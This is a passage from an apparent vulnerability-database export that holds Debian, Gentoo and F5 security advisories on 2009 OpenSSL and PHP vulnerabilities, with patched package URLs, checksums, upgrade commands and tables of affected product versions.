c2a4ffc36ee22524a10f39905ec9dac6\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch9_mips.deb\n Size/MD5 checksum: 1694148 0f92ff6fe6fc6ec1ea4b6821648ad873\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch9_mipsel.udeb\n Size/MD5 checksum: 566398 fa9c98d666f14ead8042307148559e03\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch9_mipsel.deb\n Size/MD5 checksum: 861324 227e99525d3774aab4ed35823b364e85\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch9_mipsel.deb\n Size/MD5 checksum: 993194 f6a3a9fbe33f3a24e620385c880fe650\n http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch5_mipsel.deb\n Size/MD5 checksum: 1317494 62604b0e8b4714fe4d145367c3ef8050\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch9_mipsel.deb\n Size/MD5 checksum: 2256056 ace9c8fbf8fd421e3bdf971766e97e47\n http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch5_mipsel.deb\n Size/MD5 checksum: 719118 83dd2eab20361e439e1a1ca72e8767e0\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch9_mipsel.deb\n Size/MD5 checksum: 1650408 383c6d1723b8756b28bbcd20fb48a6ad\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch5_powerpc.deb\n Size/MD5 checksum: 1382230 d08c48c0913f539b576c4fabf24d7402\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch9_powerpc.deb\n Size/MD5 checksum: 1002488 bed65e465132b21a1b3577ee598167a7\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch9_powerpc.deb\n Size/MD5 checksum: 2211326 283092faadbe1ef87aa0c35c6de9b0ee\n http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch5_powerpc.deb\n Size/MD5 checksum: 743636 6e49d29dd51372e785861e3f33992de1\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch9_powerpc.deb\n Size/MD5 checksum: 896036 4edadfc436e1241752859fe4c9793261\n http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch9_powerpc.udeb\n Size/MD5 checksum: 585388 7e01ecdd6091bea567b061cad15884d5\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch9_powerpc.deb\n Size/MD5 checksum: 1728586 f0ab004883e95bc0500589d052b63e32\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch9_s390.deb\n Size/MD5 checksum: 952152 67707818bd7d67babb987d93a55d903b\n http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch9_s390.udeb\n Size/MD5 checksum: 643206 a81bd94114398120cbf6b83eb054cbca\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch9_s390.deb\n Size/MD5 checksum: 2194170 faed7fc6f392c4de78e437e0d27e60ec\n http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch5_s390.deb\n Size/MD5 checksum: 794488 23fd96112753232253190a3774d8e185\n http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch5_s390.deb\n Size/MD5 checksum: 1317124 df4942650c247c5abb6b0ea8f291f2da\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch9_s390.deb\n Size/MD5 checksum: 1014770 0fa727a30ca7e9b7d6471b4b4ffb53a5\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch9_s390.deb\n Size/MD5 checksum: 1633656 76a770e4d783d01971f71c7f392953aa\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch9_sparc.deb\n Size/MD5 checksum: 2111766 ff845ccd3590e33849efed2accb6a06b\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch9_sparc.deb\n Size/MD5 checksum: 4090916 c8fcd70975280474ae2a92b78cc8d186\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch9_sparc.deb\n Size/MD5 checksum: 1020848 454f299a89fa6c5d3a56ed67af873071\n http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch5_sparc.deb\n Size/MD5 checksum: 3417770 709ae247e0dbcee41656dabc79740471\n http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch5_sparc.deb\n Size/MD5 checksum: 1800060 6c6400623dc52a1e2be77a7b7d45658e\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch9_sparc.deb\n Size/MD5 checksum: 2126592 515b45a886c700c951206f9812a0d775\n http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch9_sparc.udeb\n Size/MD5 checksum: 539090 ebdf1e6a431363d3cb0280fb73092631\n\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g-15+lenny5.dsc\n Size/MD5 checksum: 1972 dd98f13a10c81fdf68ad1a81fa80a659\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g-15+lenny5.diff.gz\n Size/MD5 checksum: 58681 05ba7bfb20d57b0dce44ba82d3b4fc13\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g.orig.tar.gz\n Size/MD5 checksum: 3354792 acf70a16359bf3658bdfb74bda1c4419\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g-15+lenny5_alpha.deb\n Size/MD5 checksum: 1040318 25eba3e7a518bc3fbb2f87d178151606\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8g-15+lenny5_alpha.deb\n Size/MD5 checksum: 2813032 ca66a0aa09f0466852eb8dd189e0dec6\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8g-15+lenny5_alpha.deb\n Size/MD5 checksum: 4370306 c8e53a441efde72fcc97ff209adbeae1\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8g-15+lenny5_alpha.deb\n Size/MD5 checksum: 2587954 33b02bf309bf29f7e281f5b50866f194\n http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-15+lenny5_alpha.udeb\n Size/MD5 checksum: 722004 c6b14296afcc7844ef17669a02215be1\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g-15+lenny5_amd64.deb\n Size/MD5 checksum: 1043098 533cd83609ca924342897bec36600267\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8g-15+lenny5_amd64.deb\n Size/MD5 checksum: 1627744 18612dd26ad47190bf6301bfce4b64ec\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8g-15+lenny5_amd64.deb\n Size/MD5 checksum: 2241970 304556ec5363d4b01f66aee04b4a8898\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8g-15+lenny5_amd64.deb\n Size/MD5 checksum: 975600 eb30eaea3b29a25beb21c5e218bd42f4\n http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-15+lenny5_amd64.udeb\n Size/MD5 checksum: 638334 3dea5a3bf54d480f3dcc77d9bb87f885\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g-15+lenny5_arm.deb\n Size/MD5 checksum: 1029600 0bc6ccb4c05f4206c60c26dcc1d6f027\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8g-15+lenny5_arm.deb\n Size/MD5 checksum: 845004 f549dcc97610ebce59a8902892cfe575\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8g-15+lenny5_arm.deb\n Size/MD5 checksum: 1490316 a4cd3181dd73980f1cdddff76bb7f8e7\n http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-15+lenny5_arm.udeb\n Size/MD5 checksum: 535808 afd17d07d6330072d49174e9459c5cb3\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8g-15+lenny5_arm.deb\n Size/MD5 checksum: 2088796 054baf7256c0c517f5712aebd6f438a4\n\narmel architecture (ARM EABI)\n\n http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-15+lenny5_armel.udeb\n Size/MD5 checksum: 540728 c85387b2bca2e8d2dbf178f77d841a72\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8g-15+lenny5_armel.deb\n Size/MD5 checksum: 1504108 a92f86f632b32531e1e04a1b3eca8e89\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8g-15+lenny5_armel.deb\n Size/MD5 checksum: 2100788 0a07a90f760ec2f81f06285612f6c04f\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8g-15+lenny5_armel.deb\n Size/MD5 checksum: 850022 43612474d8c4be1a9c0c001265bc331e\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g-15+lenny5_armel.deb\n Size/MD5 checksum: 1028898 cc841112479df29150139b3f8dba3ae8\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g-15+lenny5_hppa.deb\n Size/MD5 checksum: 1046802 1bb0313e66729e950cb74e6a73c4b368\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8g-15+lenny5_hppa.deb\n Size/MD5 checksum: 968942 2c5df0cee06ed8ada384a3969c2524b4\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8g-15+lenny5_hppa.deb\n Size/MD5 checksum: 1527446 c1bf37e2bb2dd81897c5fb6cdb5f5040\n http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-15+lenny5_hppa.udeb\n Size/MD5 checksum: 634574 b75dd315927ff29095a9b8b6780d0b68\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8g-15+lenny5_hppa.deb\n Size/MD5 checksum: 2268786 50ad8c5684d56079e81ecf97593e60f0\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-15+lenny5_i386.udeb\n Size/MD5 checksum: 591650 3a11d4487784cf981848dcb3f945a82e\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8g-15+lenny5_i386.deb\n Size/MD5 checksum: 2111820 8e0f1ae1d0b1ff54a293fa3a900a55e2\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8g-15+lenny5_i386.deb\n Size/MD5 checksum: 2975130 c903f96fc051a616846c32b63f71e1bc\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8g-15+lenny5_i386.deb\n Size/MD5 checksum: 5389588 61eb43bfa72dbbfbaacd5293172eec38\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g-15+lenny5_i386.deb\n Size/MD5 checksum: 1036330 e8f389664d00ccc019712ceec65515a8\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8g-15+lenny5_ia64.deb\n Size/MD5 checksum: 1282560 623fd1d1ed06e6ce618a0611760c400e\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8g-15+lenny5_ia64.deb\n Size/MD5 checksum: 1466814 6637973fb034897049eb1b29dee0a97f\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g-15+lenny5_ia64.deb\n Size/MD5 checksum: 1091616 cdd96dea4671b66e4c42d0c8cd9751e9\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8g-15+lenny5_ia64.deb\n Size/MD5 checksum: 2659336 653c99051d1f987d6c8598b0cd533dba\n http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-15+lenny5_ia64.udeb\n Size/MD5 checksum: 865488 a2ba7e6057cbc44e2b84e92b2f66e65e\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-15+lenny5_mips.udeb\n Size/MD5 checksum: 585124 1342d18c4d505dedca0bd48d63989bc4\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8g-15+lenny5_mips.deb\n Size/MD5 checksum: 1623194 19c534c53c43546343e5a339bf28b7fb\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8g-15+lenny5_mips.deb\n Size/MD5 checksum: 899538 2f83af94974335731387c036f99013b4\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8g-15+lenny5_mips.deb\n Size/MD5 checksum: 2301408 f3f73e30096a2d71cbcd7b65fa8daa68\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g-15+lenny5_mips.deb\n Size/MD5 checksum: 1012698 ead62b2b653e00aeeed58d2a801f52b5\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8g-15+lenny5_mipsel.deb\n Size/MD5 checksum: 2294756 cebdbf6c9fbc08e442e6b53f1ccc5e11\n http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-15+lenny5_mipsel.udeb\n Size/MD5 checksum: 572262 f2d4db6e1df97fc97b57b153fcf2881c\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8g-15+lenny5_mipsel.deb\n Size/MD5 checksum: 1587710 9efca6f9e89ab9fdaef44061cadfe8f4\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8g-15+lenny5_mipsel.deb\n Size/MD5 checksum: 885296 1688e692a53a469efa00a326fb4ecf32\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g-15+lenny5_mipsel.deb\n Size/MD5 checksum: 1011924 128a09bc240ea85c3af0e577acc869f2\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g-15+lenny5_s390.deb\n Size/MD5 checksum: 1039558 cf1520abf80ad52489383a36271cd413\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8g-15+lenny5_s390.deb\n Size/MD5 checksum: 1026634 2de41acbde8e0e4cd2d029a8c0091507\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8g-15+lenny5_s390.deb\n Size/MD5 checksum: 1603888 b10206f2d1b5746e69e34d3144e7f253\n http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-15+lenny5_s390.udeb\n Size/MD5 checksum: 693156 fa56c0ba480348a8fb6108c4709d93ec\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8g-15+lenny5_s390.deb\n Size/MD5 checksum: 2229708 55359122e8f637decb982f39880ac142\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8g-15+lenny5_sparc.deb\n Size/MD5 checksum: 3872634 4a0c347fddc492cb0cea81d0e6cea47b\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8g-15+lenny5_sparc.deb\n Size/MD5 checksum: 2141880 aa7d26098ffd77d8703ecb845972653a\n http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-15+lenny5_sparc.udeb\n Size/MD5 checksum: 580364 bd9bb6771d7311846a982e4049d1e47c\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g-15+lenny5_sparc.deb\n Size/MD5 checksum: 1044828 fff1ef25568fce04b4ec12c4412cc9fb\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8g-15+lenny5_sparc.deb\n Size/MD5 checksum: 2289556 cf5af49831997c491c57000cb40416a5\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show &lt;pkg&gt;&#x27; and http://packages.debian.org/&lt;pkg&gt;\n", "edition": 1, "reporter": "Debian", "published": "2009-09-15T21:37:44", "title": "[SECURITY] [DSA 1888-1] New openssl packages deprecate MD2 hash signatures", "type": "debian", "enchantments": {"score": {"modified": "2018-10-16T22:14:57", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-1386", "CVE-2009-1379", "CVE-2009-1377", "CVE-2009-2409", "CVE-2009-1387", "CVE-2009-1378"], "modified": "2009-09-15T21:37:44", "id": "DEBIAN:DSA-1888-1:9C570", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2009/msg00209.html", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:40", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1379", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1377", "https://bugs.gentoo.org/show_bug.cgi?id=270305", "https://bugs.gentoo.org/show_bug.cgi?id=292022", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1387", "https://bugs.gentoo.org/show_bug.cgi?id=280591", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2409", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1378"], "affectedPackage": [{"OS": "Gentoo", "OSVersion": "any", "packageVersion": "0.9.8l-r2", "arch": "all", "packageFilename": "UNKNOWN", "packageName": "dev-libs/openssl", "operator": "lt"}], "edition": 1, "description": "### Background\n\nOpenSSL is an Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) as well as a general purpose cryptography library. \n\n### Description\n\nMultiple vulnerabilities have been reported in OpenSSL: \n\n * Marsh Ray of PhoneFactor and Martin Rex of SAP independently reported that the TLS protocol does not properly handle session renegotiation requests (CVE-2009-3555).\n * The MD2 hash algorithm is no longer considered to be cryptographically strong, as demonstrated by Dan Kaminsky. Certificates using this algorithm are no longer accepted (CVE-2009-2409).\n * Daniel Mentz and Robin Seggelmann reported the following vulnerabilities related to DTLS: A use-after-free flaw (CVE-2009-1379) and a NULL pointer dereference (CVE-2009-1387) in the dtls1_retrieve_buffered_fragment() function in src/d1_both.c, multiple memory leaks in the dtls1_process_out_of_seq_message() function in src/d1_both.c (CVE-2009-1378), and a processing error related to a large amount of DTLS records with a future epoch in the dtls1_buffer_record() function in ssl/d1_pkt.c (CVE-2009-1377).\n\n### Impact\n\nA remote unauthenticated attacker, acting as a Man in the Middle, could inject arbitrary plain text into a TLS session, possibly leading to the ability to send requests as if authenticated as the victim. A remote attacker could furthermore send specially crafted DTLS packages to a service using OpenSSL for DTLS support, possibly resulting in a Denial of Service. Also, a remote attacker might be able to create rogue certificates, facilitated by a MD2 collision. NOTE: The amount of computation needed for this attack is still very large. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll OpenSSL users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-libs/openssl-0.9.8l-r2\"", "reporter": "Gentoo Foundation", "published": "2009-12-01T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "gentoo", "title": "OpenSSL: Multiple vulnerabilities", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1379", "CVE-2009-1377", "CVE-2009-2409", "CVE-2009-1387", "CVE-2009-1378", "CVE-2009-3555"], "modified": "2009-12-02T00:00:00", "id": "GLSA-200912-01", "href": "https://security.gentoo.org/glsa/200912-01", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "f5": [{"lastseen": "2016-03-19T09:02:02", "references": [], "edition": 1, "description": "A heap-based buffer overflow in PHP 4.3.0 through 5.2.6 may allow attackers to execute arbitrary code.\n\nInformation about this advisory is available at the following location:\n\n**Note**: This link takes you to a resource outside of AskF5, and it is possible that the information may be removed without our knowledge.\n\n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5557>\n\nF5 Product Development tracked this issue as ID 309780 (formerly CR115185) and it was fixed in BIG-IP ASM version 11.0.0.\n", "reporter": "f5", "published": "2009-03-12T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "SOL9761 - PHP vulnerability - CVE-2008-5557", "type": "f5", "bulletinFamily": "software", "cvelist": ["CVE-2008-5557"], "modified": "2013-03-29T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/9000/700/sol9761.html", "id": "SOL9761", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-08T10:18:47", "references": [], "edition": 1, "description": "\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM | None \n| 11.0.0 - 11.5.1 \n10.0.0 - 10.2.4 \n| None \nBIG-IP AAM | None | 11.4.0 - 11.5.1 \n| None \nBIG-IP AFM | None | 11.3.0 - 11.5.1 \n| None \nBIG-IP Analytics | None | 11.0.0 - 11.5.1 \n| None \nBIG-IP APM | None | 11.0.0 - 11.5.1 \n10.1.0 - 10.2.4 \n| None \nBIG-IP ASM | None | 11.0.0 - 11.5.1 \n10.0.0 - 10.2.4 \n| None \nBIG-IP Edge Gateway \n| None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 \n| None \nBIG-IP GTM | None | 11.0.0 - 11.5.1 \n10.0.0 - 10.2.4 \n| None \nBIG-IP Link Controller | None \n| 11.0.0 - 11.5.1 \n10.0.0 - 10.2.4 \n| None \nBIG-IP PEM | None \n| 11.3.0 - 11.5.1 \n| None \nBIG-IP PSM | None | 11.0.0 - 11.4.1 \n10.0.0 - 10.2.4 \n| None \nBIG-IP WebAccelerator | None | 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4 \n| None \nBIG-IP WOM | None | 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4 \n| None \nARX | None | 6.0.0 - 6.4.0 \n| None \nEnterprise Manager | None | 3.0.0 - 3.1.1 \n2.1.0 - 2.3.0 \n| None \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 \n| None \nBIG-IQ Cloud | None \n| 4.0.0 - 4.3.0 \n| None \nBIG-IQ Device | None \n| 4.2.0 - 4.3.0 \n| None \nBIG-IQ Security | None | 4.0.0 - 4.3.0 | None \nLineRate | None | 2.3.0 - 2.3.1 \n2.2.0 - 2.2.4 \n1.6.0 - 1.6.3 | None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents.](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "reporter": "f5", "published": "2014-06-20T00:59:00", "title": "OpenSSL vulnerability CVE-2009-1378", "type": "f5", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2009-1378"], "modified": "2017-03-14T22:07:00", "href": "https://support.f5.com/csp/article/K15359", "id": "F5:K15359", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-10-24T00:57:34", "references": [], "description": "\nF5 Product Development has assigned ID 466118 (BIG-IP) to track this issue. Additionally, BIG-IP [iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/ >) may list Heuristic H467459 on the **Diagnostics **&gt;** Identified** &gt; **Medium** screen. \n\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 HF11 \n| 12.0.0 \n11.4.0 - 11.6.0 \n10.2.4 HF12 \n| COMPAT SSL ciphers \nBIG-IP AAM | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 HF11 \n| 12.0.0 \n11.4.0 - 11.6.0 \n10.2.4 HF12 \n| COMPAT SSL ciphers \nBIG-IP AFM | 11.3.0 \n| 12.0.0 \n11.4.0 - 11.6.0 \n| COMPAT SSL ciphers \nBIG-IP Analytics | 11.0.0 - 11.3.0 \n| 12.0.0 \n11.4.0 - 11.6.0 \n| COMPAT SSL ciphers \nBIG-IP APM | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 HF11 \n| 12.0.0 \n11.4.0 - 11.6.0 \n10.2.4 HF12 \n| COMPAT SSL ciphers \nBIG-IP ASM | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 HF11 \n| 12.0.0 \n11.4.0 - 11.6.0 \n10.2.4 HF12 \n| COMPAT SSL ciphers \nBIG-IP DNS | None | 12.0.0 | None \nBIG-IP Edge Gateway \n| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 HF11 \n| 10.2.4 HF12 | COMPAT SSL ciphers \nBIG-IP GTM | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 HF11 \n| 11.4.0 - 11.6.0 \n10.2.4 HF12 \n| COMPAT SSL ciphers \nBIG-IP Link Controller | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 HF11 | 12.0.0 \n11.4.0 - 11.6.0 \n10.2.4 HF12 \n| COMPAT SSL ciphers \nBIG-IP PEM | 11.3.0 \n| 12.0.0 \n11.4.0 - 11.6.0 | COMPAT SSL ciphers \nBIG-IP PSM | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 HF11 \n| 11.4.0 - 11.4.1 \n10.2.4 HF12 \n| COMPAT SSL ciphers \nBIG-IP WebAccelerator | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 HF11 \n| 10.2.4 HF12 | COMPAT SSL ciphers \nBIG-IP WOM | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 HF11 \n| 10.2.4 HF12 | COMPAT SSL ciphers \nARX | None | 6.0.0 - 6.4.0 \n| None \nEnterprise Manager | None | 3.0.0 - 3.1.1 \n2.1.0 - 2.3.0 \n| None \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 \n| None \nBIG-IQ Cloud | None \n| 4.0.0 - 4.3.0 \n| None \nBIG-IQ Device | None \n| 4.2.0 - 4.3.0 \n| None \nBIG-IQ Security | None \n| 4.0.0 - 4.3.0 \n| None \nLineRate | None | 2.2.0 - 2.4.0 \n1.6.0 - 1.6.4 | None\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists. \n \nF5 is responding to this vulnerability as determined by the parameters defined in [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>). \n\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x)](<https://support.f5.com/csp/article/K13123>)\n * [K10025: Managing BIG-IP product hotfixes (10.x)](<https://support.f5.com/csp/article/K10025>)\n * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n * [K10322: FirePass hotfix matrix](<https://support.f5.com/csp/article/K10322>)\n * [K12766: ARX hotfix matrix](<https://support.f5.com/csp/article/K12766>)\n * [K3430: Installing FirePass hotfixes](<https://support.f5.com/csp/article/K3430>)\n * [K6664: Obtaining and installing OPSWAT hotfixes](<https://support.f5.com/csp/article/K6664>)\n * [K10942: Installing OPSWAT hotfixes on BIG-IP APM systems](<https://support.f5.com/csp/article/K10942>)\n * [K13163: 